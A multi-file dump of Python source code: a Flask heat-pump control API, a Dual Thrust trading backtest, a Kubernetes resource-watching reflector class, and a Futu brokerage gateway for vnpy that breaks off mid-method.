if not request.json or 'data' not in request.json:
abort(400)
previous_state = pump.get_json_state()
pump.load_bytes(request.json['data'])
save_state()
return jsonify({})
@app.route('/api/set', methods=['POST'])
def set():
if not request.json or not 'apply' in request.json:
abort(400)
data = request.json
previous_state = pump.get_json_state()
if 'on' in data:
pump.on = bool(data['on'])
if 'hvac_mode' in data:
pump.hvac_mode = data['hvac_mode']
if 'temp' in data:
if isinstance(data['temp'], list):
if data['temp'][0] == '+':
pump.set_temperature(pump.temp+data['temp'][1])
else:
assert data['temp'][0] == '-'
pump.set_temperature(pump.temp-data['temp'][1])
else:
pump.set_temperature(data['temp'])
if 'wide_vane' in data:
pump.wide_vane = data['wide_vane']
if 'fan_speed' in data:
pump.set_fan(data['fan_speed'])
if 'vane' in data:
pump.vane = data['vane']
if 'clock' in data:
pump.clock = data['clock']
if 'end_time' in data:
pump.end_time = data['end_time']
if 'start_time' in data:
pump.end_time = data['start_time']
if 'prog' in data:
pump.end_time = data['prog']
if 'econo_cool' in data:
pump.end_time = bool(data['econo_cool'])
if 'long_mode' in data:
pump.end_time = bool(data['long_mode'])
if 'apply' in data:
if data['apply']:
program_heatpump()
return jsonify({"prev": previous_state, "new": pump.get_json_state()})
@app.route('/api/status', methods=['GET'])
def get_status():
return jsonify(pump.get_json_state())
|
dual_thrust.py
|
"""
The Dual Thrust trading algorithm is a famous strategy developed by Michael Chalek.
It is a breakout system, commonly used in futures, forex and equity markets.
The limits are based on today’s opening price plus or minus a certain percentage of recent trading range.
When the price breaks through the upper level, it will long, and when it breaks the lower level, it will short.
1. recent trading range is relatively stable, using four price points;
2. Percentage K1 and K2 can be asymmetric
https://www.quantconnect.com/tutorials/strategy-library/dual-thrust-trading-algorithm
Similar to quantconnect, got negative Sharpe -0.377.
It is an intraday breakout strategy, requires tickdata; holding position for a year is against the essence of this strategy.
Improvements: 1. profit target and stop loss. 2. confirmation e.g. MA5min>MA10min
"""
import os
import numpy as np
import pandas as pd
import pytz
from datetime import datetime, timezone
import multiprocessing
import talib
import quanttrader as qt
import matplotlib.pyplot as plt
import empyrical as ep
import pyfolio as pf
# set browser full width
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:100% !important; }</style>"))
class DualThrust(qt.StrategyBase):
def __init__(self,
n=4, k1=0.5, k2=0.5
):
super(DualThrust, self).__init__()
self.n = n
self.k1 = k1
self.k2 = k2
self.current_time = None
def on_tick(self, tick_event):
self.current_time = tick_event.timestamp
# print('Processing {}'.format(self.current_time))
symbol = self.symbols[0]
df_hist = self._data_board.get_hist_price(symbol, tick_event.timestamp)
# need n day trading range
if df_hist.shape[0] < self.n:
return
high = df_hist.High.iloc[-self.n:]
low = df_hist.Low.iloc[-self.n:]
close = df_hist.Close.iloc[-self.n:]
current_open = df_hist.Open.iloc[-1]
current_price = df_hist.Close.iloc[-1]
current_size = self._position_manager.get_position_size(symbol)
npv = self._position_manager.current_total_capital
HH, HC, LC, LL = max(high), max(close), min(close), min(low)
signal_range = max(HH - LC, HC - LL)
selltrig = current_open - self.k2 * signal_range
buytrig = current_open + self.k1 * signal_range
if current_price > buytrig: # buy on upper break
if current_size > 0:
return
target_size = int(npv / current_price)
self.adjust_position(symbol, size_from=current_size, size_to=target_size, timestamp=self.current_time)
print(f'{self.current_time}, BUY ORDER SENT, {symbol}, Price: {current_price:.2f}, '
f'Buy trigger: {buytrig:.2f}, Size: {current_size}, Target Size: {target_size}')
elif current_price < selltrig: # sell on down break
if current_size < 0:
return
target_size = -int(npv / current_price)
self.adjust_position(symbol, size_from=current_size, size_to=target_size, timestamp=self.current_time)
print(f'{self.current_time}, SELL ORDER SENT, {symbol}, Price: {current_price:.2f}, '
f'Sell trigger: {selltrig:.2f}, Size: {current_size}, Target Size: {target_size}')
def parameter_search(engine, tag, target_name, return_dict):
"""
This function should be the same for all strategies.
The only reason not included in quanttrader is because of its dependency on pyfolio (to get perf_stats)
"""
ds_equity, _, _ = engine.run()
try:
strat_ret = ds_equity.pct_change().dropna()
perf_stats_strat = pf.timeseries.perf_stats(strat_ret)
target_value = perf_stats_strat.loc[target_name] # first table in tuple
except KeyError:
target_value = 0
return_dict[tag] = target_value
if __name__ == '__main__':
do_optimize = False
run_in_jupyter = False
symbol = 'SPX'
benchmark = 'SPX'
datapath = os.path.join('../data/', f'{symbol}.csv')
data = qt.util.read_ohlcv_csv(datapath)
init_capital = 100_000.0
test_start_date = datetime(2010,1,1, 8, 30, 0, 0, pytz.timezone('America/New_York'))
test_end_date = datetime(2019,12,31, 6, 0, 0, 0, pytz.timezone('America/New_York'))
if do_optimize: # parallel parameter search
params_list = []
for n_ in [3, 4, 5, 10]:
for k_ in [0.4, 0.5, 0.6]:
params_list.append({'n': n_, 'k1': k_, 'k2': k_})
target_name = 'Sharpe ratio'
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for params in params_list:
strategy = DualThrust()
strategy.set_capital(init_capital)
strategy.set_symbols([symbol])
backtest_engine = qt.BacktestEngine(test_start_date, test_end_date)
backtest_engine.set_capital(init_capital) # capital or portfolio >= capital for one strategy
backtest_engine.add_data(symbol, data)
strategy.set_params({'n': params['n'], 'k1': params['k1'], 'k2': params['k2']})
backtest_engine.set_strategy(strategy)
tag = (params['n'], params['k1'], params['k2'])
p = multiprocessing.Process(target=parameter_search, args=(backtest_engine, tag, target_name, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
for k,v in return_dict.items():
print(k, v)
else:
strategy = DualThrust()
strategy.set_capital(init_capital)
strategy.set_symbols([symbol])
strategy.set_params({'n':4, 'k1': 0.5, 'k2': 0.5})
# Create a Data Feed
backtest_engine = qt.BacktestEngine(test_start_date, test_end_date)
backtest_engine.set_capital(init_capital) # capital or portfolio >= capital for one strategy
backtest_engine.add_data(symbol, data)
backtest_engine.set_strategy(strategy)
ds_equity, df_positions, df_trades = backtest_engine.run()
# save to excel
qt.util.save_one_run_results('./output', ds_equity, df_positions, df_trades)
# ------------------------- Evaluation and Plotting -------------------------------------- #
strat_ret = ds_equity.pct_change().dropna()
strat_ret.name = 'strat'
bm = qt.util.read_ohlcv_csv(os.path.join('../data/', f'{benchmark}.csv'))
bm_ret = bm['Close'].pct_change().dropna()
bm_ret.index = pd.to_datetime(bm_ret.index)
bm_ret = bm_ret[strat_ret.index]
bm_ret.name = 'benchmark'
perf_stats_strat = pf.timeseries.perf_stats(strat_ret)
perf_stats_all = perf_stats_strat
perf_stats_bm = pf.timeseries.perf_stats(bm_ret)
perf_stats_all = pd.concat([perf_stats_strat, perf_stats_bm], axis=1)
perf_stats_all.columns = ['Strategy', 'Benchmark']
drawdown_table = pf.timeseries.gen_drawdown_table(strat_ret, 5)
monthly_ret_table = ep.aggregate_returns(strat_ret, 'monthly')
monthly_ret_table = monthly_ret_table.unstack().round(3)
ann_ret_df = pd.DataFrame(ep.aggregate_returns(strat_ret, 'yearly'))
ann_ret_df = ann_ret_df.unstack().round(3)
print('-------------- PERFORMANCE ----------------')
print(perf_stats_all)
print('-------------- DRAWDOWN ----------------')
print(drawdown_table)
print('-------------- MONTHLY RETURN ----------------')
print(monthly_ret_table)
print('-------------- ANNUAL RETURN ----------------')
print(ann_ret_df)
if run_in_jupyter:
pf.create_full_tear_sheet(
strat_ret,
benchmark_rets=bm_ret,
positions=df_positions,
transactions=df_trades,
round_trips=False)
plt.show()
else:
f1 = plt.figure(1)
pf.plot_rolling_returns(strat_ret, factor_returns=bm_ret)
f1.show()
f2 = plt.figure(2)
pf.plot_rolling_volatility(strat_ret, factor_returns=bm_ret)
f2.show()
f3 = plt.figure(3)
pf.plot_rolling_sharpe(strat_ret)
f3.show()
f4 = plt.figure(4)
pf.plot_drawdown_periods(strat_ret)
f4.show()
f5 = plt.figure(5)
pf.plot_monthly_returns_heatmap(strat_ret)
f5.show()
f6 = plt.figure(6)
pf.plot_annual_returns(strat_ret)
f6.show()
f7 = plt.figure(7)
pf.plot_monthly_returns_dist(strat_ret)
plt.show()
|
reflector.py
|
# specifically use concurrent.futures for threadsafety
# asyncio Futures cannot be used across threads
from concurrent.futures import Future
import time
import threading
from traitlets.config import LoggingConfigurable
from traitlets import Any, Dict, Unicode
from kubernetes import client, config, watch
from tornado.ioloop import IOLoop
class NamespacedResourceReflector(LoggingConfigurable):
"""
Base class for keeping a local up-to-date copy of a set of kubernetes resources.
Must be subclassed once per kind of resource that needs watching.
"""
labels = Dict(
{},
config=True,
help="""
Labels to reflect onto local cache
"""
)
fields = Dict(
{},
config=True,
help="""
Fields to restrict the reflected objects
"""
)
namespace = Unicode(
None,
allow_none=True,
help="""
Namespace to watch for resources in
"""
)
resources = Dict(
{},
help="""
Dictionary of resource names to the appropriate resource objects.
This can be accessed across threads safely.
"""
)
kind = Unicode(
'resource',
help="""
Human readable name for kind of object we're watching for.
Used for diagnostic messages.
"""
)
list_method_name = Unicode(
"",
help="""
Name of function (on apigroup respresented by `api_group_name`) that is to be called to list resources.
This will be passed a namespace & a label selector. You most likely want something
of the form list_namespaced_<resource> - for example, `list_namespaced_pod` will
give you a PodReflector.
This must be set by a subclass.
"""
)
api_group_name = Unicode(
'CoreV1Api',
help="""
Name of class that represents the apigroup on which `list_method_name` is to be found.
Defaults to CoreV1Api, which has everything in the 'core' API group. If you want to watch Ingresses,
for example, you would have to use ExtensionsV1beta1Api
"""
)
on_failure = Any(help="""Function to be called when the reflector gives up.""")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load kubernetes config here, since this is a Singleton and
# so this __init__ will be run way before anything else gets run.
try:
config.load_incluster_config()
except config.ConfigException:
config.load_kube_config()
self.api = getattr(client, self.api_group_name)()
# FIXME: Protect against malicious labels?
self.label_selector = ','.join(['{}={}'.format(k, v) for k, v in self.labels.items()])
self.field_selector = ','.join(['{}={}'.format(k, v) for k, v in self.fields.items()])
self.first_load_future = Future()
self._stop_event = threading.Event()
self.start()
def _list_and_update(self):
"""
Update current list of resources by doing a full fetch.
Overwrites all current resource info.
"""
initial_resources = getattr(self.api, self.list_method_name)(
self.namespace,
label_selector=self.label_selector,
field_selector=self.field_selector
)
# This is an atomic operation on the dictionary!
self.resources = {p.metadata.name: p for p in initial_resources.items}
# return the resource version so we can hook up a watch
return initial_resources.metadata.resource_version
def _watch_and_update(self):
"""
Keeps the current list of resources up-to-date
This method is to be run not on the main thread!
We first fetch the list of current resources, and store that. Then we
register to be notified of changes to those resources, and keep our
local store up-to-date based on these notifications.
We also perform exponential backoff, giving up after we hit 32s
wait time. This should protect against network connections dropping
and intermittent unavailability of the api-server. Every time we
recover from an exception we also do a full fetch, to pick up
changes that might've been missed in the time we were not doing
a watch.
Note that we're playing a bit with fire here, by updating a dictionary
in this thread while it is probably being read in another thread
without using locks! However, dictionary access itself is atomic,
and as long as we don't try to mutate them (do a 'fetch / modify /
update' cycle on them), we should be ok!
"""
cur_delay = 0.1
while True:
self.log.info("watching for %s with label selector %s / field selector %s in namespace %s", self.kind, self.label_selector, self.field_selector, self.namespace)
w = watch.Watch()
try:
resource_version = self._list_and_update()
if not self.first_load_future.done():
# signal that we've loaded our initial data
self.first_load_future.set_result(None)
for ev in w.stream(
getattr(self.api, self.list_method_name),
self.namespace,
label_selector=self.label_selector,
field_selector=self.field_selector,
resource_version=resource_version,
):
cur_delay = 0.1
resource = ev['object']
if ev['type'] == 'DELETED':
# This is an atomic delete operation on the dictionary!
self.resources.pop(resource.metadata.name, None)
else:
# This is an atomic operation on the dictionary!
self.resources[resource.metadata.name] = resource
if self._stop_event.is_set():
break
except Exception:
cur_delay = cur_delay * 2
if cur_delay > 30:
self.log.exception("Watching resources never recovered, giving up")
if self.on_failure:
self.on_failure()
return
self.log.exception("Error when watching resources, retrying in %ss", cur_delay)
time.sleep(cur_delay)
continue
finally:
w.stop()
if self._stop_event.is_set():
self.log.info("%s watcher stopped", self.kind)
break
def start(self):
"""
Start the reflection process!
We'll do a blocking read of all resources first, so that we don't
race with any operations that are checking the state of the pod
store - such as polls. This should be called only once at the
start of program initialization (when the singleton is being created),
and not afterwards!
"""
if hasattr(self, 'watch_thread'):
raise ValueError('Thread watching for resources is already running')
self._list_and_update()
self.watch_thread = threading.Thread(target=self._watch_and_update)
# If the watch_thread is only thread left alive, exit app
self.watch_thread.daemon = True
self.watch_thread.start()
def stop(self):
self._stop_event.set()
|
futu_gateway.py
|
"""
Please install futu-api before use.
"""
from copy import copy
from collections import OrderedDict
from datetime import datetime
from threading import Thread
from time import sleep
from futu import (
KLType,
ModifyOrderOp,
TrdSide,
TrdEnv,
OpenHKTradeContext,
OpenQuoteContext,
OpenUSTradeContext,
OrderBookHandlerBase,
OrderStatus,
OrderType,
RET_ERROR,
RET_OK,
StockQuoteHandlerBase,
TradeDealHandlerBase,
TradeOrderHandlerBase
)
from vnpy.trader.constant import Direction, Exchange, Product, Status
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.gateway import BaseGateway, LocalOrderManager
from vnpy.trader.object import (
BarData,
TickData,
OrderData,
TradeData,
AccountData,
ContractData,
PositionData,
SubscribeRequest,
OrderRequest,
CancelRequest,
HistoryRequest,
Interval
)
EXCHANGE_VT2FUTU = {
Exchange.SMART: "US",
Exchange.SEHK: "HK",
Exchange.HKFE: "HK_FUTURE",
}
EXCHANGE_FUTU2VT = {v: k for k, v in EXCHANGE_VT2FUTU.items()}
PRODUCT_VT2FUTU = {
Product.EQUITY: "STOCK",
Product.INDEX: "IDX",
Product.ETF: "ETF",
Product.WARRANT: "WARRANT",
Product.BOND: "BOND",
}
DIRECTION_VT2FUTU = {
Direction.LONG: TrdSide.BUY,
Direction.SHORT: TrdSide.SELL,
}
DIRECTION_FUTU2VT = {v: k for k, v in DIRECTION_VT2FUTU.items()}
STATUS_FUTU2VT = {
OrderStatus.NONE: Status.SUBMITTING,
OrderStatus.SUBMITTING: Status.SUBMITTING,
OrderStatus.SUBMITTED: Status.NOTTRADED,
OrderStatus.FILLED_PART: Status.PARTTRADED,
OrderStatus.FILLED_ALL: Status.ALLTRADED,
OrderStatus.CANCELLED_ALL: Status.CANCELLED,
OrderStatus.CANCELLED_PART: Status.CANCELLED,
OrderStatus.SUBMIT_FAILED: Status.REJECTED,
OrderStatus.FAILED: Status.REJECTED,
OrderStatus.DISABLED: Status.CANCELLED,
}
KLTYPE_MINUTES = [1, 3, 5, 15, 30, 60]
class FutuGateway(BaseGateway):
"""
富途证券API
# 网络访问路径: vnpy=>FutuGateway=>FutuOpenD 本地客户端[端口11111] => 富途证券
# FutuOpenD下载地址 https://www.futunn.com/download/openAPI?lang=zh-CN
# windows: 安装完毕后,使用客户端登录=》短信验证=》建立本地11111端口侦听
"""
default_setting = {
"密码": "", # 交易密码
"地址": "127.0.0.1",
"端口": 11111,
"市场": ["HK", "US"],
"环境": [TrdEnv.REAL, TrdEnv.SIMULATE],
}
# 支持的交易所清单
exchanges = list(EXCHANGE_FUTU2VT.values())
def __init__(self, event_engine, gateway_name="FUTU"):
"""Constructor"""
super(FutuGateway, self).__init__(event_engine, gateway_name)
self.quote_ctx = None
self.trade_ctx = None
self.host = ""
self.port = 0
self.market = ""
self.password = ""
self.env = TrdEnv.SIMULATE
self.ticks = {}
self.trades = set()
self.contracts = {}
# 引入本地委托单号《=》接口委托单号的管理
self.order_manager = LocalOrderManager(gateway=self, order_prefix='', order_rjust=4)
self.thread = Thread(target=self.query_data)
# For query function.
self.count = 0
self.interval = 1
self.query_funcs = [self.query_account, self.query_position]
def connect(self, setting: dict):
""""""
self.host = setting["地址"]
self.port = setting["端口"]
self.market = setting["市场"]
self.password = setting["密码"]
self.env = setting["环境"]
self.connect_quote()
self.connect_trade()
self.thread.start()
def query_data(self):
"""
使用异步线程单独查询
Query all data necessary.
"""
sleep(2.0) # Wait 2 seconds till connection completed.
self.query_contract()
self.query_trade()
self.query_order()
self.query_position()
self.query_account()
# Start fixed interval query.
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def process_timer_event(self, event):
"""定时器"""
self.count += 1
if self.count < self.interval:
return
self.count = 0
func = self.query_funcs.pop(0)
func()
self.query_funcs.append(func)
def connect_quote(self):
"""
Connect to market data server.
连接行情服务器
"""
self.quote_ctx = OpenQuoteContext(self.host, self.port)
# 股票行情处理的实现
class QuoteHandler(StockQuoteHandlerBase):
gateway = self
# 处理信息回调 =》 gateway.process_quote
def on_recv_rsp(self, rsp_str):
ret_code, content = super(QuoteHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_quote(content)
return RET_OK, content
# 订单簿的实现
class OrderBookHandler(OrderBookHandlerBase):
gateway = self
# 处理订单簿信息流回调 => gateway.process_orderbook
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderBookHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_orderbook(content)
return RET_OK, content
# 绑定两个实现方法
self.quote_ctx.set_handler(QuoteHandler())
self.quote_ctx.set_handler(OrderBookHandler())
self.quote_ctx.start()
self.write_log("行情接口连接成功")
def connect_trade(self):
"""
Connect to trade server.
连接交易服务器
"""
# Initialize context according to market.
if self.market == "US":
self.trade_ctx = OpenUSTradeContext(self.host, self.port)
else:
self.trade_ctx = OpenHKTradeContext(self.host, self.port)
# Implement handlers.
# 订单回报的实现
class OrderHandler(TradeOrderHandlerBase):
gateway = self
# 订单回报流 =》gateway.process_order
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_order(content)
return RET_OK, content
# 交易回报的实现
class DealHandler(TradeDealHandlerBase):
gateway = self
# 成交回报流 =》 gateway.process_deal
def on_recv_rsp(self, rsp_str):
ret_code, content = super(DealHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_deal(content)
return RET_OK, content
# Unlock to allow trading.
# 解锁交易接口
code, data = self.trade_ctx.unlock_trade(self.password)
if code == RET_OK:
self.write_log("交易接口解锁成功")
else:
self.write_log(f"交易接口解锁失败,原因:{data}")
# Start context.
# 绑定订单回报、成交回报
self.trade_ctx.set_handler(OrderHandler())
self.trade_ctx.set_handler(DealHandler())
self.trade_ctx.start()
self.write_log("交易接口连接成功")
def subscribe(self, req: SubscribeRequest):
"""订阅行情"""
for data_type in ["QUOTE", "ORDER_BOOK"]:
futu_symbol = convert_symbol_vt2futu(req.symbol, req.exchange)
code, data = self.quote_ctx.subscribe(futu_symbol, data_type, True)
if code:
self.write_log(f"订阅行情失败:{data}")
def query_history(self, req: HistoryRequest):
"""查询某只股票的历史K线数据"""
history = []
limit = 60
if req.interval not in [Interval.MINUTE, Interval.DAILY]:
self.write_error(f'查询股票历史范围,本接口只支持分钟/日线')
return history
futu_code = '{}.{}'.format(EXCHANGE_VT2FUTU.get(req.exchange), req.symbol)
if req.interval == Interval.MINUTE:
if req.interval_num not in KLTYPE_MINUTES:
self.write_error(f'查询股票历史范围,请求分钟数{req.interval_num}不在范围:{KLTYPE_MINUTES}')
return history
k_type = f'K_{req.interval_num}M'
else:
if req.interval_num != 1:
self.write_error(f'查询股票历史范围,请求日线{req.interval_num}只能是1')
return history
k_type = KLType.K_DAY
start_date = req.start.strftime('%Y-%m-%d')
end_date = req.end.strftime('%Y-%m-%d') if req.end else None
ret, df, page_req_key = self.quote_ctx.request_history_kline(
code=futu_code,
ktype=k_type,
start=start_date,
end=end_date,
max_count=limit) # 每页5个,请求第一页
if ret == RET_OK:
for index, row in df.iterrows():
symbol = row['code']
str_time = row['time_key']
dt = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S')
bar = BarData(
gateway_name=self.gateway_name,
symbol=row['code'],
exchange=req.exchange,
datetime=dt,
trading_day=dt.strftime('%Y-%m-%d'),
interval=req.interval,
interval_num=req.interval_num,
volume=row['volume'],
open_price=float(row['open']),
high_price=float(row['high']),
low_price=float(row['low']),
close_price=float(row['close'])
)
history.append(bar)
else:
return history
while page_req_key != None: # 请求后面的所有结果
ret, df, page_req_key = self.quote_ctx.request_history_kline(
code=futu_code,
ktype=k_type,
start=start_date,
end=end_date,
page_req_key=page_req_key) # 请求翻页后的数据
if ret == RET_OK:
for index, row in df.iterrows():
symbol = row['code']
str_time = row['time_key']
dt = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S')
bar = BarData(
gateway_name=self.gateway_name,
symbol=row['code'],
exchange=req.exchange,
datetime=dt,
trading_day=dt.strftime('%Y-%m-%d'),
interval=req.interval,
interval_num=req.interval_num,
volume=row['volume'],
open_price=float(row['open']),
high_price=float(row['high']),
low_price=float(row['low']),
close_price=float(row['close'])
)
history.append(bar)
return history
def download_bars(self, req: HistoryRequest):
"""获取某只股票的历史K线数据"""
history = []
limit = 60
if req.interval not in [Interval.MINUTE, Interval.DAILY]:
self.write_error(f'查询股票历史范围,本接口只支持分钟/日线')
return history
futu_code = '{}.{}'.format(EXCHANGE_VT2FUTU.get(req.exchange), req.symbol)
if req.interval == Interval.MINUTE:
if req.interval_num not in KLTYPE_MINUTES:
self.write_error(f'查询股票历史范围,请求分钟数{req.interval_num}不在范围:{KLTYPE_MINUTES}')
return history
k_type = f'K_{req.interval_num}M'
else:
if req.interval_num != 1:
self.write_error(f'查询股票历史范围,请求日线{req.interval_num}只能是1')
return history
k_type = KLType.K_DAY
start_date = req.start.strftime('%Y-%m-%d')
end_date = req.end.strftime('%Y-%m-%d') if req.end else None
ret, df, page_req_key = self.quote_ctx.request_history_kline(
code=futu_code,
ktype=k_type,
start=start_date,
end=end_date,
max_count=limit) # 每页5个,请求第一页
if ret == RET_OK:
for index, row in df.iterrows():
symbol = row['code']
str_time = row['time_key']
dt = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S')
bar = OrderedDict({
"datetime": str_time,
"open": float(row['open']),
"close": float(row['close']),
"high": float(row['high']),
"low": float(row['low']),
"volume": row['volume'],
"amount": row['turnover'],
"symbol": row['code'],
"trading_date": dt.strftime('%Y-%m-%d'),
"date": dt.strftime('%Y-%m-%d'),
"time": dt.strftime('%H:%M:%S'),
"pre_close": float(row['last_close']),
"turnover_rate": float(row.get('turnover_rate', 0)),
"change_rate": float(row.get('change_rate', 0))
})
history.append(bar)
else:
return history
while page_req_key != None: # 请求后面的所有结果
ret, df, page_req_key = self.quote_ctx.request_history_kline(
code=futu_code,
ktype=k_type,
start=start_date,
end=end_date,
page_req_key=page_req_key) # 请求翻页后的数据
if ret == RET_OK:
for index, row in df.iterrows():
symbol = row['code']
str_time = row['time_key']
dt = datetime.strptime(str_time, '%Y-%m-%d %H:%M:%S')
bar = OrderedDict({
"datetime": str_time,
"open": float(row['open']),
"close": float(row['close']),
"high": float(row['high']),
"low": float(row['low']),
"volume": row['volume'],
"amount": row['turnover'],
"symbol": row['code'],
"trading_date": dt.strftime('%Y-%m-%d'),
"date": dt.strftime('%Y-%m-%d'),
"time": dt.strftime('%H:%M:%S'),
"pre_close": float(row['last_close']),
"turnover_rate": float(row.get('turnover_rate', 0)),
"change_rate": float(row.get('change_rate', 0))
})
history.append(bar)
return history
def send_order(self, req: OrderRequest):
"""发送委托"""
side = DIRECTION_VT2FUTU[req.direction]
futu_order_type = OrderType.NORMAL # Only limit order is supported.
# Set price adjustment mode to inside adjustment.
if req.direction is Direction.LONG:
adjust_limit = 0.05
else:
adjust_limit = -0.05
futu_symbol = convert_symbol_vt2futu(req.symbol, req.exchange)
# 港股交易手数为整数
if req.exchange == Exchange.SEHK:
self.write_log(f'交易手数:{req.volume}=>{int(req.volume)}')
req.volume = int(req.volume)
local_orderid = self.order_manager.new_local_orderid()
order = req.create_order_data(local_orderid, self.gateway_name)
# 发出委托确认
order.status = Status.SUBMITTING
self.order_manager.on_order(order)
code, data = self.trade_ctx.place_order(
req.price,
req.volume,
futu_symbol,
side,
futu_order_type,
trd_env=self.env,
adjust_limit=adjust_limit,
)
if code:
self.write_log(f"委托失败:{data}")
order.status = Status.REJECTED
self.order_manager.on_order(order)
return ""
sys_orderid = ""
for ix, row in data.iterrows():
sys_orderid = str(row.get("order_id",""))
if len(sys_orderid) > 0:
self.write_log(f'系统委托号:{sys_orderid}')
break
if len(sys_orderid) == 0:
order.status = Status.REJECTED
self.order_manager.on_order(order)
return ""
# 绑定 系统委托号
order.sys_orderid = sys_orderid
order.status = Status.NOTTRADED
self.order_manager.update_orderid_map(local_orderid, sys_orderid)
# 更新订单为已委托
self.order_manager.on_order(copy(order))
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
""""""
order = self.order_manager.get_order_with_local_orderid(req.orderid)
# 更新订单委托状态为正在撤销
if order:
if order.status in [Status.REJECTED, Status.ALLTRADED, Status.CANCELLED]:
self.write_error(f'委托单:{req.orderid},状态已经是:{order.status},不能撤单')
return False
order.status = Status.CANCELLING
self.order_manager.on_order(order)
sys_orderid = order.sys_orderid
else:
sys_orderid = req.orderid
# 向接口发出撤单请求
code, data = self.trade_ctx.modify_order(
ModifyOrderOp.CANCEL, sys_orderid, 0, 0, trd_env=self.env
)
if code:
self.write_log(f"撤单失败:{data}")
return False
else:
self.write_log(f'成功发出撤单请求:orderid={req.orderid},sys_orderid:{sys_orderid}')
return True
def query_contract(self):
""""""
for product, futu_product in PRODUCT_VT2FUTU.items():
code, data = self.quote_ctx.get_stock_basicinfo(
self.market, futu_product
)
self.write_log(f'开始查询{futu_product}市场的合约清单')
if code:
self.write_log(f"查询合约信息失败:{data}")
return
for ix, row in data.iterrows():
symbol, exchange = convert_symbol_futu2vt(row["code"])
contract = ContractData(
symbol=symbol,
exchange=exchange,
name=row["name"],
product=product,
size=1,
pricetick=0.001,
net_position=True,
history_data=True,
gateway_name=self.gateway_name,
)
self.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.write_log("合约信息查询成功")
def query_account(self):
""""""
code, data = self.trade_ctx.accinfo_query(trd_env=self.env, acc_id=0)
if code:
self.write_log(f"查询账户资金失败:{data}")
return
for ix, row in data.iterrows():
account = AccountData(
accountid=f"{self.gateway_name}_{self.market}",
balance=float(row["total_assets"]),
frozen=(float(row["total_assets"]) - float(row["avl_withdrawal_cash"])),
gateway_name=self.gateway_name,
)
self.on_account(account)
def query_position(self):
""""""
code, data = self.trade_ctx.position_list_query(
trd_env=self.env, acc_id=0
)
if code:
self.write_log(f"查询持仓失败:{data}")
return
for ix, row in data.iterrows():
symbol, exchange = convert_symbol_futu2vt(row["code"])
pos = PositionData(
symbol=symbol,
exchange=exchange,
direction=Direction.LONG,
volume=row["qty"],
frozen=(float(row["qty"]) - float(row["can_sell_qty"])),
price=float(row["cost_price"]),
pnl=float(row["pl_val"]),
gateway_name=self.gateway_name,
)
self.on_position(pos)
def query_order(self):
""""""
code, data = self.trade_ctx.order_list_query("", trd_env=self.env)
if code:
self.write_log(f"查询委托失败:{data}")
return
self.process_order(data)
self.write_log("委托查询成功")
def query_trade(self):
""""""
code, data = self.trade_ctx.deal_list_query("", trd_env=self.env)
if code:
self.write_log(f"查询成交失败:{data}")
return
self.process_deal(data)
self.write_log("成交查询成功")
def close(self):
""""""
if self.quote_ctx:
self.quote_ctx.close()
if self.trade_ctx:
self.trade_ctx.close()
def get_tick(self, code):
"""
Get tick buffer.
"""
tick = self.ticks.get(code, None)
symbol, exchange = convert_symbol_futu2vt(code)
if not tick:
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
return tick
def process_quote(self, data):
"""报价推送"""
for ix, row in data.iterrows():
symbol = row["code"]
tick = self.get_tick(symbol)
date = row["data_date"].replace("-", "")
time = row["data_time"]
tick.datetime = datetime.strptime(
f"{date} {time}", "%Y%m%d %H:%M:%S")
tick.open_price = row["open_price"]
tick.high_price = row["high_price"]
tick.low_price = row["low_price"]
tick.pre_close = row["prev_close_price"]
tick.last_price = row["last_price"]
tick.volume = row["volume"]
if "price_spread" in row:
spread = row["price_spread"]
tick.limit_up = tick.last_price + spread * 10
tick.limit_down = tick.last_price - spread * 10
self.on_tick(copy(tick))
def process_orderbook(self, data):
""""""
symbol = data["code"]
tick = self.get_tick(symbol)
d = tick.__dict__
for i in range(5):
bid_data = data["Bid"][i]
ask_data = data["Ask"][i]
n = i + 1
d["bid_price_%s" % n] = bid_data[0]
d["bid_volume_%s" % n] = bid_data[1]
d["ask_price_%s" % n] = ask_data[0]
d["ask_volume_%s" % n] = ask_data[1]
if tick.datetime:
self.on_tick(copy(tick))
def process_order(self, data):
"""
Process order data for both query and update.
"""
for ix, row in data.iterrows():
# Ignore order with status DELETED
if row["order_status"] == OrderStatus.DELETED:
continue
symbol, exchange = convert_symbol_futu2vt(row["code"])
# 获取系统委托编号
sys_orderid = str(row["order_id"])
# 系统委托变化=》 缓存 order
order = self.order_manager.get_order_with_sys_orderid(sys_orderid)
if order is None:
# 本地委托 《=》系统委托号
local_orderid = self.order_manager.get_local_orderid(sys_orderid)
# 创建本地order缓存
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=local_orderid,
sys_orderid=sys_orderid,
direction=DIRECTION_FUTU2VT[row["trd_side"]],
price=float(row["price"]),
volume=row["qty"],
traded=row["dealt_qty"],
status=STATUS_FUTU2VT[row["order_status"]],
time=row["create_time"].split(" ")[-1],
gateway_name=self.gateway_name,
)
self.write_log(f'新建委托单缓存=>{order.__dict__}')
self.order_manager.on_order(copy(order))
else:
# 缓存order存在,判断状态、成交数量是否发生变化
changed = False
order_status = STATUS_FUTU2VT[row["order_status"]]
if order.status != order_status:
order.status = order_status
changed = True
if order.traded != row["dealt_qty"]:
order.traded = row["dealt_qty"]
changed = True
